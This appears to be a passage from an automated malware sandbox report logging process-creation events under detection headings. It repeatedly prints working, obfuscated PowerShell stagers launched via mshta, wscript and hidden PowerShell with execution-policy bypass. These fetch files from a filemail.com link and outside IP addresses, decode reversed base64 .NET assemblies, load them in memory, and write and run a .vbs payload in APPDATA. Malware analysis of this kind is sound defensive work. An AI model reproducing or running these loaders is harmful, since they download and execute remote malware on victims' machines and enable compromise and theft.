                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  PowerShell case anomaly found
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
